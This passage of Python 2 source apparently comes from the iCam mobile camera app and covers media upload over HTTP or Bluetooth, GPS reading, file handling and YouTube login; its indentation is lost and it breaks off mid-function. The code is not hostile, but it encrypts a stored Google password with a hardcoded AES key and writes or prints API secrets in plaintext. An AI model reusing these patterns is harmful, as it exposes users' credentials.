httpRequestHeader = {"Connection:": "Keep-alive",
"Content-type": "application/x-gzip",
"Accept": "text/plain"}
"""
From http://forums.devshed.com/python-programming-11/httplib-urllib-how-do-i-keep-a-connection-open-142565.html:
"there is a Connection: Keep-alive option that you can pass in the
header, if you use HTTP/1.1 protocol."
"""
try:
"""
if HTTP_INTERNET_UPLOAD_FAST == False:
myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
"""
myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
if SYMBIAN_UIQ_OS:
DebugPrint("InternetUploadBinaryData(): returned " \
"from httplib.HTTPConnection().")
"""
!!!!len(dataToUpload) might be big (> 1MB), and it is not good to
read all data in RAM at once. So do buffered reading and
sending.!!!!
From http://docs.python.org/library/httplib.html.
HTTPConnection.request(method, url[, body[, headers]])
This will send a request to the server using the HTTP request
method method and the selector url.
If the body argument is present, it should be a string of data to
send after the headers are finished.
!!!!Alternatively, it may be an open file object, in which case the
contents of the file is sent; this file object should support
fileno() and read() methods.
The header Content-Length is automatically set to the correct value.
The headers argument should be a mapping of extra HTTP headers to
send with the request.
"""
myHTTPConnection.request("POST", pageOnServer,
dataToUpload, httpRequestHeader)
if SYMBIAN_UIQ_OS:
DebugPrint("InternetUploadBinaryData(): returned from " \
"myHTTPConnection.request().")
if SYMBIAN_OS:
"""
DebugPrint("InternetUploadBinaryData(): before calling " \
"e32.ao_yield().")
"""
"""
This has the effect of flushing the eventual pending UI events.
From [Mobile_Python_2007]: "The e32.ao_yield() at the end of
the loop makes sure that the system leaves some time to
register the keyboard events, as drawing in the tight loop
consumes lots of CPU power and might make the system
unresponsive."
From PyS60 2.0 documentation: Yields to the active scheduler to
have ready active objects with priority above normal
scheduled for running. This has the effect of flushing the
eventual pending UI events. Note that the UI callback code
may be run in the context of the thread that performs an
ao_yield. For information on active scheduler, see S60 SDK
documentation [4].
"""
# e32.ao_yield()
pass
"""
DebugPrint("InternetUploadBinaryData(): after calling " \
"e32.ao_yield().")
"""
"""
From http://docs.python.org/library/httplib.html:
"Note that you must have read the whole response before you can
send a new request to the server."
But I am not doing this...
"""
"""
# Get the response.
# From http://docs.python.org/library/httplib.html:
# "Note that you must have read the whole response before you can
# send a new request to the server."
httpResponse = myHTTPConnection.getresponse()
"""
if HTTP_INTERNET_UPLOAD_FAST == False:
# Get the response.
# From http://docs.python.org/library/httplib.html: "Note that
# you must have read the whole response before you can send
# a new request to the server."
httpResponse = myHTTPConnection.getresponse()
"""
I don't really believe this info from 2003 is valid now:
From http://mail.python.org/pipermail/tutor/2003-May/022635.html:
"In order to re-use the connection, before you make the
next request, you need to read the data from the last
request. Not sure why that is, but thats the way it is.
So make sure you do your read.
Hope that helps someone else out there."
"""
httpResponseString = httpResponse.read()
DebugPrint("InternetUploadBinaryData(): " \
"httpResponseString = %s." % httpResponseString)
# Close the connection.
myHTTPConnection.close()
"""
else:
# Close the connection - I don't like to leave so many
# connections open... :)
myHTTPConnection.close()
"""
except:
DebugPrintErrorTrace()
TreatException("InternetUploadBinaryData()")
res = -1
# Save data in Unsent.
if (res == -1) and (saveUnsentPackets > 0):
SaveUnsentData(dataToUpload, pageOnServer)
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2:
if itIsASeparateThread == False:
"""
We have one main thread for upload and the other are parallel to
this one. (Basically, we do this such that if
numThreadsUpload == 1 we don't spawn any new thread.)
"""
if numThreadIssued > 0:
numThreadIssued -= 1
return res
InternetUploadBinaryData = InternetUploadBinaryDataStandard
def AddPacketHeader(rawData, footer=False):
global deviceId
"""
IMPORTANT: We require < to specify no alignment
(see http://docs.python.org/library/struct.html)
"""
if footer == True:
return rawData + struct.pack(deviceIdFormat, deviceId)
else:
return struct.pack(deviceIdFormat, deviceId) + rawData
# InternetUploadGZippedData() is used to send media files and text messages.
def InternetUploadGZippedData(aDeviceId, uncompressedData, inetServerAddress,
pageOnServer):
global accessPointName
global LOCAL_FOLDER_UNSENT_FILES
global EXTENSION_TEXT_MESSAGE, EXTENSION_STATE_AND_MEDIA_FILE, \
EXTENSION_ARBITRARY_FILE
global WEBPAGE_UL_GZIPPED_TEXT, WEBPAGE_UL_GZIPPED_STATE_AND_FILE, \
WEBPAGE_UL_GZIPPED_FILE
try:
DebugPrint("Entered InternetUploadGZippedData(%s): accessPointName = %s, " \
"pageOnServer = %s, len(uncompressedData) = %d." % \
(aDeviceId, accessPointName, pageOnServer,
len(uncompressedData)))
# Add deviceId identifier in front of uncompressedData.
#uncompressedData = struct.pack("100s", aDeviceId) + uncompressedData
# + "\n"
#uncompressedData = struct.pack("100s", aDeviceId) + uncompressedData
uncompressedData = AddPacketHeader(uncompressedData)
# Compress the data.
compressedData = uncompressedData.encode("zlib")
return InternetUploadBinaryData(compressedData,
inetServerAddress, pageOnServer)
except:
DebugPrint("InternetUploadGZippedData exception.")
DebugPrintErrorTrace()
return -1
def UploadBinaryData(dataToUpload, inetServerAddress, inetPageOnServer,
fileName=None): # fileName is currently used ONLY for media files and FIL?? packets.
global MY_DEBUG_STDOUT, bluetoothMode, accessPointName, \
bluetoothServerAddress
PetWatchdog()
myText = "UploadBinaryData(): len(dataToUpload) = %d (size of data " \
"packet sent in bytes), inetServerAddress = %s, " \
"inetPageOnServer = %s, fileName = %s." \
% (len(dataToUpload), inetServerAddress, inetPageOnServer,
fileName)
if inetPageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE:
# BT client
if bluetoothMode == 2:
"""
UploadUnsentFILES() #Attempting to send the unsent media files, as
well, before sending the current media file.
"""
myText += "Uploading to the Bluetooth server only."
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
return BluetoothUploadBinaryData(bluetoothServerAddress,
dataToUpload, fileName)
else:
"""
It should ALWAYS hold: aDeviceId == deviceId. Impersonating a
different phone is no longer necessary - I was using this
before, to relay a message.
"""
# First condition is to avoid calling very often
# UploadUnsentFILES() and 2nd is to check if it is the BT server.
#if (not pathFileName.startswith(LOCAL_FOLDER_UNSENT_FILES) and
# bluetoothMode == 1):
# If the phone is standalone (not BT) or BT server.
if bluetoothMode == 0 or bluetoothMode == 1:
# Attempting to send the unsent files, as well, before sending
# the current data.
UploadUnsentFILES()
myText += "Uploading via Internet."
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
res = InternetUploadBinaryData(dataToUpload, inetServerAddress,
inetPageOnServer)
DebugPrint("UploadBinaryData(): InternetUploadBinaryData " \
"returned %d." % res)
return res
elif inetPageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
# BT client
if bluetoothMode == 2:
"""
Attempting to send the unsent media files, as well, before
sending the current media file.
"""
# UploadUnsentFILES()
return BluetoothUploadBinaryData(bluetoothServerAddress,
dataToUpload, None)
else:
return InternetUploadBinaryData(dataToUpload,
inetServerAddress, inetPageOnServer)
elif inetPageOnServer == WEBPAGE_UL_GZIPPED_FILE:
# BT client
if bluetoothMode == 2:
"""
Attempting to send the unsent media files, as well, before sending
the current media file.
"""
# UploadUnsentFILES()
"""
We only use EXTENSION_ARBITRARY_FILE to specify we upload an
arbitrary file.
"""
return BluetoothUploadBinaryData(bluetoothServerAddress,
dataToUpload, EXTENSION_ARBITRARY_FILE)
else:
myText += "Uploading via Internet."
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
return InternetUploadBinaryData(dataToUpload,
inetServerAddress, inetPageOnServer)
"""
Uploads via Internet or Bluetooth, depending on bluetoothMode.
fileName is required for BluetoothUploadGZippedData - on Bluetooth we specify
the type of packet sent via the file name.
The bluetoothServerAddress is global; !!!!inetServerAddress should be made
global, then.
"""
def UploadGZippedData(aDeviceId, uncompressedData, inetServerAddress,
inetPageOnServer, fileName=None):
"""
!!!!
struct.pack()
UploadBinaryData(aDeviceId, uncompressedData, inetServerAddress,
inetPageOnServer, fileName)
"""
global MY_DEBUG_STDOUT, bluetoothMode, accessPointName, \
bluetoothServerAddress
#if SYMBIAN_UIQ_OS:
DebugPrint("Entered UploadGZippedData().")
PetWatchdog()
myText = "UploadGZippedData(): len(uncompressedData) = %d, " \
"inetServerAddress = %s, inetPageOnServer = %s, " \
"fileName = %s. " % \
(len(uncompressedData), inetServerAddress,
inetPageOnServer, fileName)
if inetPageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE:
# BT client
if bluetoothMode == 2:
"""
Attempting to send the unsent media files, as well, before
sending the current media file.
"""
#UploadUnsentFILES()
myText += "Uploading to the Bluetooth server only."
DebugPrint(myText)
if MY_DEBUG_STDERR_2:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
return BluetoothUploadGZippedData(bluetoothServerAddress,
uncompressedData, fileName, newMode=NEW_BT_FORMAT)
else:
if (accessPointName != u"") and (accessPointRetryConnect == False):
"""
It should ALWAYS hold: aDeviceId == deviceId. Impersonating a
different phone is no longer necessary - I was using this
before, to relay a message.
"""
"""
First condition is to avoid calling very often
UploadUnsentFILES() and 2nd is to check if it is the
BT server.
"""
#if (not pathFileName.startswith(LOCAL_FOLDER_UNSENT_FILES))
# and (bluetoothMode == 1):
# If the phone is standalone (no BT) or BT server:
if bluetoothMode == 0 or bluetoothMode == 1:
"""
Attempting to send the unsent media files, as well, before
sending the current media file.
"""
UploadUnsentFILES()
myText += "Uploading via Internet."
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
res = InternetUploadGZippedData(aDeviceId, uncompressedData,
inetServerAddress, inetPageOnServer)
DebugPrint("UploadGZippedData(%s): InternetUploadGZippedData " \
"returned %d." % (aDeviceId, res))
return res
elif inetPageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
DebugPrint(myText + \
"Uploading text depending on bluetoothMode=%d." % bluetoothMode)
# BT client
if bluetoothMode == 2:
"""
Attempting to send the unsent media files, as well, before sending
the current media file.
# UploadUnsentFILES()
"""
return BluetoothUploadGZippedData(bluetoothServerAddress,
uncompressedData, None, newMode=NEW_BT_FORMAT)
else:
return InternetUploadGZippedData(aDeviceId,
uncompressedData, inetServerAddress,
inetPageOnServer)
elif inetPageOnServer == WEBPAGE_UL_GZIPPED_FILE:
# BT client
if bluetoothMode == 2:
"""
Attempting to send the unsent media files, as well, before sending
the current media file.
"""
# UploadUnsentFILES()
# We only use EXTENSION_ARBITRARY_FILE to specify we upload an
# arbitrary file.
return BluetoothUploadGZippedData(bluetoothServerAddress,
uncompressedData, EXTENSION_ARBITRARY_FILE)
else:
myText += "Uploading via Internet."
DebugPrint(myText)
if MY_DEBUG_STDERR_2:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
return InternetUploadGZippedData(aDeviceId,
uncompressedData, inetServerAddress,
inetPageOnServer)
def ReadGPSPosition():
global readGPS
global gpsInfo
if readGPS:
DebugPrint("Entered ReadGPSPosition() - readGPS = %s." % readGPS)
try:
DebugPrint("GPS last_position: %s\n" % \
str(positioning.last_position()) + \
"Reading current GPS coordinates...")
"""
From PyS60 doc: Note that the first position()-call may take a long
time (because of gps technology).
position(course=0, satellites=0, callback=None,
interval=positioning.POSITION INTERVAL, partial=0)
"""
gpsInfo = positioning.position(1, 1)
DebugPrint("GPS position: %s." % gpsInfo)
except:
DebugPrint("ReadGPSPosition(): positioning.last_position() or " \
"position() returned an exception.")
DebugPrintErrorTrace()
appuifw.note(u"Returned from reading current GPS coordinates...",
"info")
if isNaN(gpsInfo["course"]["speed"]):
gpsInfo["course"]["speed"] = -1.0
if isNaN(gpsInfo["course"]["heading"]):
gpsInfo["course"]["heading"] = -1.0
if isNaN(gpsInfo["course"]["heading_accuracy"]):
gpsInfo["course"]["heading_accuracy"] = -1.0
if isNaN(gpsInfo["course"]["speed_accuracy"]):
gpsInfo["course"]["speed_accuracy"] = -1.0
else:
gpsInfo["position"]["latitude"] = 0.0
gpsInfo["position"]["longitude"] = 0.0
gpsInfo["position"]["altitude"] = 0.0
gpsInfo["position"]["vertical_accuracy"] = 0.0
gpsInfo["position"]["horizontal_accuracy"] = 0.0
gpsInfo["course"]["speed"] = 0.0
gpsInfo["course"]["heading"] = 0.0
gpsInfo["course"]["heading_accuracy"] = 0.0
gpsInfo["course"]["speed_accuracy"] = 0.0
gpsInfo["satellites"]["horizontal_dop"] = 0.0
gpsInfo["satellites"]["vertical_dop"] = 0.0
gpsInfo["satellites"]["time_dop"] = 0.0
gpsInfo["satellites"]["time"] = 0.0
gpsInfo["satellites"]["used_satellites"] = -1
gpsInfo["satellites"]["satellites"] = -1
#DebugPrint("Exiting ReadGPSPosition()")
def CopyFile(srcPathFileName, dstFileName, myCopyBufferSize=16 * 1024):
try:
srcFile = open(srcPathFileName, "rb")
dstFile = open(dstFileName, "wb")
while True:
myCopyBuffer = srcFile.read(myCopyBufferSize)
if myCopyBuffer:
dstFile.write(myCopyBuffer)
else:
break
srcFile.close()
dstFile.close()
except:
if MY_DEBUG_STDERR:
sys.stderr.write("CopyFile(%s, %s, %d): exception.\n" %
(srcPathFileName, dstFileName,
myCopyBufferSize))
DebugPrintErrorTrace()
return -1
return 0
def MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName):
if ANDROID_OS or WINDOWS_CE_OS_PYTHONCE or WINDOWS_OS or RASPBIAN_OS:
DebugPrint("Entered MoveFileBetweenAnyDrives().")
try:
os.rename(srcPathFileName, dstPathFileName)
except:
if MY_DEBUG_STDERR:
sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
"exception.\n" % \
(srcPathFileName, dstPathFileName))
DebugPrintErrorTrace()
return -1
elif SYMBIAN_OS:
if srcPathFileName[0:2] != dstPathFileName[0:2]:
"""
The source and destination drives differ so moving implies copying
src to dst and deleting src.
"""
if CopyFile(srcPathFileName, dstPathFileName) == -1:
return -1
try:
os.unlink(srcPathFileName)
except:
if MY_DEBUG_STDERR:
sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
"exception.\n" %
(srcPathFileName, dstPathFileName))
DebugPrintErrorTrace()
else:
try:
os.rename(srcPathFileName, dstPathFileName)
except:
if MY_DEBUG_STDERR:
sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
"exception.\n" %
(srcPathFileName, dstPathFileName))
DebugPrintErrorTrace()
return -1
return 0
def RepairGoogleKeywords():
global googleKeywords
#!!!!TODO: look for exact minimal length required.
# otherwise gives "too short" exception
MIN_LEN_GOOGLE_KEYWORDS = 15
if len(googleKeywords) < MIN_LEN_GOOGLE_KEYWORDS:
googleKeywords += "*" * (MIN_LEN_GOOGLE_KEYWORDS - len(googleKeywords))
def StoreLocalConfigInFile():
global googleUsername, googleRememberPassword #, googlePassword
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer, \
googleKeywords, googleMediaPrivate
DebugPrint("Entered StoreLocalConfigInFile().")
RepairGoogleKeywords()
if SYMBIAN_OS:
if SYMBIAN_3:
"""
We call RedrawHandler() since normally it is invoked very rare on
S^3 devices (test S^1 devices!!!) - only at the beginning of
iCam 2-3 times and at Quit().
"""
RedrawHandler(None)
else:
pass
if gdataModulesImported == False:
ImportGdataModules()
"""
if (not gdataModulesImported):
return
"""
try:
fOutput = open(LOCAL_CONFIG_PATH_FILENAME, "w")
fOutput.write("# Description: Google username\n")
fOutput.write(googleUsername + "\n")
except:
DebugPrintErrorTrace()
try:
myTextNot = "# Description: encrypted Google password - not " \
"stored\n\n"
if googleRememberPassword:
"""
Padding spaces at the end of googlePassword since it needs to be
multiple of 16 chars long.
From C:\Python25\Lib\site-packages\gdata\tlslite\utils\AES.py
assert(len(plaintext) % 16 == 0)
"""
plainText = GetGooglePassword()
while len(plainText) % 16 != 0:
plainText += " "
# cipher = Python_AES.new(AES_SECRET_KEY, 2, AES_IV)
cipher = gdata.tlslite.utils.Python_AES.new(AES_SECRET_KEY,
2, AES_IV)
if sys.version_info[0 : 2] == (2, 2):
encodedText = base64.encodestring(cipher.encrypt(plainText))
else:
encodedText = base64.b64encode(cipher.encrypt(plainText))
# clearText
# At least on Python 2.2 they add an extra "\r\n" to encodedText
encodedText = encodedText.rstrip("\r\n")
#print "cipher.encrypt(plainText) = [%s]" % str(cipher.encrypt(plainText))
#print "encodedText = %s" % str(encodedText)
fOutput.write("# Description: encrypted Google password\n")
fOutput.write(encodedText + "\n")
else:
fOutput.write(myTextNot)
except:
fOutput.write(myTextNot)
DebugPrintErrorTrace()
try:
fOutput.write("# Description: uploadMediaToYouTube (0 = False, " \
"1 = True)\n")
fOutput.write(str(int(uploadMediaToYouTube)) + "\n")
fOutput.write("# Description: uploadMediaToPicasa (0 = False, " \
"1 = True)\n")
fOutput.write(str(int(uploadMediaToPicasa)) + "\n")
fOutput.write("# Description: useiCamServer (0 = No, " \
"1 = No media upload, 2 = All (upload State + Media, download updates and commands)\n")
fOutput.write(str(int(useiCamServer)) + "\n")
fOutput.write("# Description: googleRememberPassword (0 = False, " \
"1 = True)\n")
fOutput.write(str(int(googleRememberPassword)) + "\n")
fOutput.write("# Description: googleMediaPrivate (0 = False, " \
"1 = True)\n")
fOutput.write(str(int(googleMediaPrivate)) + "\n")
fOutput.write("# Description: googleKeywords (used for YouTube and " \
"Picasa)\n")
fOutput.write(googleKeywords + "\n")
fOutput.write("# Description: YOUTUBE_TEST_CLIENT_ID\n")
fOutput.write(YOUTUBE_TEST_CLIENT_ID + "\n")
fOutput.write("# Description: YouTube developer key\n")
fOutput.write(youtubeDeveloperKey + "\n")
fOutput.write("# Description: IQE_KEY\n")
fOutput.write(IQE_KEY + "\n")
fOutput.write("# Description: IQE_SECRET\n")
fOutput.write(IQE_SECRET + "\n")
except:
DebugPrintErrorTrace()
try:
# fOutput.flush()
fOutput.close()
except:
DebugPrintErrorTrace()
try:
import base64
except:
DebugPrintErrorTrace()
def GetGooglePassword():
global googlePasswordEncrypted, googlePassword
DebugPrint("Entered GetGooglePassword().")
#print "Entered GetGooglePassword(): googlePassword = %s." % googlePassword
try:
if googlePassword is not None:
return googlePassword
"""
googlePasswordEncrypted contains the password read from
LOCAL_CONFIG_PATH_FILENAME
"""
if googlePasswordEncrypted is None:
return ""
else:
if gdataModulesImported == False:
ImportGdataModules()
"""
I need to reinitialize the Python_AES for decryption because the
self.IV which is initalized with the 3rd param in new() is
changed at every Python_AES.encrypt() call, so I need self.IV
again with the initial value.
"""
# cipher = Python_AES.new(AES_SECRET_KEY, 2, AES_IV)
cipher = gdata.tlslite.utils.Python_AES.new(AES_SECRET_KEY,
2, AES_IV)
if sys.version_info[0 : 2] == (2, 2):
googlePasswordAux = \
cipher.decrypt(base64.decodestring(googlePasswordEncrypted))
#googlePasswordAux = googlePasswordAux.tostring().rstrip()
else:
googlePasswordAux = \
cipher.decrypt(base64.b64decode(googlePasswordEncrypted))
#print "decodedText = %s" % decodedText
"""
We remove the added spaces at the end of the password which made it
have length % 16 == 0.
Funny: if we leave the password with trailing spaces
gdata + youtube don't complain and it logs in.
"""
googlePasswordAux = googlePasswordAux.rstrip()
if False:
#if True:
DebugPrint("LoadLocalConfigFromFile(): " \
"googlePasswordAux = %s." % googlePasswordAux)
googlePassword = googlePasswordAux
#return googlePasswordAux.rstrip()
return googlePassword
except:
DebugPrintErrorTrace()
stateLoaded = False
def LoadLocalConfigFromFile(pathFileName):
# global googleUsername, googlePassword, googleRememberPassword
# global uploadMediaToYouTube, uploadMediaToPicasa, googleKeywords
# global googleMediaPrivate
global googleUsername, googlePasswordEncrypted, \
googleRememberPassword
global uploadMediaToYouTube, uploadMediaToPicasa, \
useiCamServer, googleMediaPrivate, googleKeywords
#global saveUnsentPackets
#global internetUploadMaxErrors
global YOUTUBE_TEST_CLIENT_ID, youtubeDeveloperKey
global IQE_KEY, IQE_SECRET
DebugPrint("Entered LoadLocalConfigFromFile()")
"""
if not gdataModulesImported:
return
"""
def ReadNextNonCommentLine(fInput, rstripStr=None):
try:
#!!!!TODO: we can do also: for fLine in fInput:
while True:
fLine = fInput.readline()
# Note that an empty line before EOF still has at least \n
if fLine:
fLine = fLine.rstrip(rstripStr)
else:
return None
#if not fLine.startswith("# Description:"):
if not fLine.startswith("#"):
return fLine
except:
DebugPrintErrorTrace()
try:
if os.path.isfile(pathFileName):
fInput = open(pathFileName, "r")
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
googleUsername = fLine.rstrip()
fLine = ReadNextNonCommentLine(fInput, "\r\n")
if fLine is None:
return
googlePasswordEncrypted = fLine
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
uploadMediaToYouTube = fLine
uploadMediaToYouTube = int(uploadMediaToYouTube)
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
uploadMediaToPicasa = fLine
uploadMediaToPicasa = int(uploadMediaToPicasa)
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
useiCamServer = fLine
useiCamServer = int(useiCamServer)
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
googleRememberPassword = fLine
googleRememberPassword = int(googleRememberPassword)
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
googleMediaPrivate = fLine
googleMediaPrivate = int(googleMediaPrivate)
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
googleKeywords = fLine
RepairGoogleKeywords()
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
YOUTUBE_TEST_CLIENT_ID = fLine
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
youtubeDeveloperKey = fLine
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
IQE_KEY = fLine
fLine = ReadNextNonCommentLine(fInput)
if fLine is None:
return
IQE_SECRET = fLine
# fInput.flush()
fInput.close()
else:
DebugPrint("LoadLocalConfigFromFile(): could not find file %s." % \
pathFileName)
except:
DebugPrintErrorTrace()
if MY_DEBUG_STDOUT:
try:
print "LoadLocalConfigFromFile(): read the following:"
print " googleUsername =", googleUsername
#print " googlePassword =", googlePassword
print " googleRememberPassword =", googleRememberPassword
print " uploadMediaToYouTube =", uploadMediaToYouTube
print " uploadMediaToPicasa =", uploadMediaToPicasa
if useiCamServer == 0:
myText = "no data"
elif useiCamServer == 1:
myText = "only state"
elif useiCamServer == 2:
myText = "all state and media data"
print " useiCamServer = %d (%s to iCam server)" % (useiCamServer, myText)
print " googleMediaPrivate =", googleMediaPrivate
print " googleKeywords =", googleKeywords
print " YOUTUBE_TEST_CLIENT_ID =", YOUTUBE_TEST_CLIENT_ID
print " youtubeDeveloperKey =", youtubeDeveloperKey
print " IQE_KEY =", IQE_KEY
print " IQE_SECRET =", IQE_SECRET
sys.stdout.flush()
except:
DebugPrintErrorTrace()
if ANDROID_OS:
PETTING_FILENAME = "/sdcard/iCamAlive"
elif UNIX_OS:
PETTING_FILENAME = "./iCamAlive"
elif SYMBIAN_OS:
PETTING_FILENAME = "D:/iCamAlive"
elif iOS_PYOBJC:
PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif WINDOWS_OS:
PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif WINDOWS_CE_OS_PYTHONCE:
PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif RASPBIAN_OS:
PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
def PetWatchdog():
"""
Another idea: check modif time of STATE_PATH_FILENAME if always updating it in
UploadStateAndFileAndStoreState() - this actually happens only for
fileName is None.
Maybe save file in LOCAL_FOLDER.
"""
if ANDROID_OS:
pass
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
"""
On PyUIQ 0.2 it seems executing e32.ao_yield() makes Python crash with
error - maybe because I don't have a Canvas set? !!!!:
Program Python
Reason code LDR-IMPORT
Reason number 2
and then:
Program Py_246948292
Reason code KERN-EXEC
Reason number 0
"""
e32.ao_yield()
if MY_DEBUG_STDOUT:
print "Entered PetWatchdog() at %s." % \
GetCurrentDateTimeStringNice()
if conserveEnergy == False:
sys.stdout.flush()
try:
# if not os.path.exists(PETTING_FILENAME):
if not os.path.isfile(PETTING_FILENAME):
fOutput = open(PETTING_FILENAME, "wb")
# fOutput.write()
fOutput.close()
except:
DebugPrintErrorTrace()
try:
import pyiqe
hasPyIQE = True
except:
hasPyIQE = False
DebugPrintErrorTrace()
def IQEnginesPhotoUpload(photoPathFileName):
if hasPyIQE == False:
return
try:
# From readme.md
iqe = pyiqe.Api(IQE_KEY, IQE_SECRET)
# Alex commented this
# iqe = Api(version="1.2")
DebugPrint("IQEnginesPhotoUpload(): Time before query: %s." % \
GetCurrentDateTimeStringWithMilliseconds())
# "C:/OpenCV2.2/samples/python/1Good/snap00027_bla.bmp"
(response, qid) = iqe.query(photoPathFileName)
DebugPrint("IQEnginesPhotoUpload(): Time after query: %s. " \
"response = %s." % \
(GetCurrentDateTimeStringWithMilliseconds(),
str(response)))
"""
From http://developer.iqengines.com/apidoc/current/faqs/index.html#what-is-the-crowdsourcing-api
Can you recognize multiple objects?
Yes! We return by default the strongest match only.
If you would like to retrieve all objects that are identified in your
images, you can pass the multiple_results paramter in your
Query API request.
"""
DebugPrint("IQEnginesPhotoUpload(): sending query with qid %s." % \
str(qid))
#assert response == {'data': {'error': 0}},
# "Invalid Response while querying: \n%s " % response
if response != {u"data": {"error": 0}}:
return
DebugPrint("\nIQEnginesPhotoUpload(): waiting for results...")
response = iqe.update()
DebugPrint(response)
DebugPrint("IQEnginesPhotoUpload(): Time after update(): %s." % \
GetCurrentDateTimeStringWithMilliseconds())
DebugPrint("\nIQEnginesPhotoUpload(): retrieving results manually.")
# time.sleep(2)
# time.sleep(20)
# time.sleep(60)
SleepAndPetWatchdog(60.0)
response = iqe.result(qid)
DebugPrint("IQEnginesPhotoUpload(): response = %s." % str(response))
"""
Possible responses:
{u'data': {u'results':
[{u'color': u'Mostly gray brown, with some blue.',
u'labels': u'Titan'}],
u'error': 0}}.
{u'data': {u'comment':
u"The results for qid " \
"82e6b37dfcd16b273cd861e21c74f8c0d7a0ba6c are not available yet",
u'error': 0}}.
"""
if int(response[u"data"][u"error"]) != 0:
return
# responseToDisplay = str(response[u"data"][u"results"][0][u"labels"])
responseToDisplay = ""
for key in response[u"data"]:
if key != "error":
# print response[u"data"][key]
responseToDisplay += str(response[u"data"][key])
DebugPrint("IQEnginesPhotoUpload(): responseToDisplay = %s." % \
responseToDisplay)
#print "IQEnginesPhotoUpload(): response = %s. " \
# responseToDisplay = %s." % (str(response), responseToDisplay)
DisplayNote("IQE tagged photo as %s." % responseToDisplay, -1.0)
DebugPrint("IQEnginesPhotoUpload(): Time after result(): %s" % \
GetCurrentDateTimeStringWithMilliseconds())
except:
DebugPrintErrorTrace()
youtubeClient = None
youtubeClientAlreadyConnected = False
def ConnectToYouTubeGData():
global youtubeClient, youtubeClientAlreadyConnected
DebugPrint("Entered ConnectToYouTubeGData().")
try:
youtubeClient = gdata.youtube.service.YouTubeService()
youtubeClient.email = googleUsername
# youtubeClient.email = "googleUser"
youtubeClient.password = GetGooglePassword()
# youtubeClient.password = ""
#if True:
if False:
UploadByEmailAttachement(
sender="googleUser@gmail.com",
recipients=["alex.susu@gmail.com"],
mediaPathFileName="/mnt/sdcard/external_sd/iCam/test.txt")
youtubeClient.source = YOUTUBE_TEST_CLIENT_ID
youtubeClient.developer_key = youtubeDeveloperKey
youtubeClient.client_id = YOUTUBE_TEST_CLIENT_ID
youtubeClient.ProgrammaticLogin()
youtubeClientAlreadyConnected = True
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
errorStr = "Exception in ConnectToYouTubeGData() - details: " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. Bailing out..." % \
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
if exceptionValue == "The connect operation timed out":
# str(exceptionType).find("socket.sslerror") #<class 'socket.sslerror'>
Quit()
return -1
"""
def YouTubeVideoUploadThroughProxy(pathFileName, fileName, aKeyword,
crtTime = None, mediaTimeStr = "", mediaDateStr = "", deviceId = "",
cameraId = 0):
DebugPrint("Entered YouTubeVideoUploadThroughProxy(pathFileName = %s, " \
"fileName = %s, aKeyword = %s)." % (pathFileName, fileName,
aKeyword))
youtubeProxyServerAddress = ICAM_GAE_SERVER_NAME
# Typical exception given: gaierror: (11001, 'getaddrinfo failed')
#youtubeProxyServerAddress = "http://localhost:8080"
#youtubeProxyServerAddress = "localhost:8080"
pageOnServer = "/proxyyoutube"
# Testing the get of proxyyoutube - it works ;)
if False:
try:
httpResponseString = urllib.urlopen("http://" + \
youtubeProxyServerAddress + pageOnServer).read()
DebugPrint("YouTubeVideoUploadThroughProxy(): " \
"httpResponseString = %s." % httpResponseString)
return
except:
DebugPrintErrorTrace()
# httpRequestHeader = {"Connection:": "Keep-alive",
# "Content-type": "application/x-gzip", "Accept": "text/plain"}
#User-agent
# httpRequestHeader = {"Content-type": "application/octet-stream",
# "Accept": "text/plain"}
httpRequestHeader = {
#"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; " \
# "rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17",
#"Accept": "text/plain",
"Accept": "text/plain",
#"Accept": "text/html,application/xhtml+xml,application/xml;" \
# "q=0.9,*.*;q=0.8",
#"Accept-Language": "en-us,en;q=0.5",
#"Accept-Encoding": "gzip,deflate",
#"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "1150",
#"Cookie": "ACSID=AJKY",
#"DNT": "1",
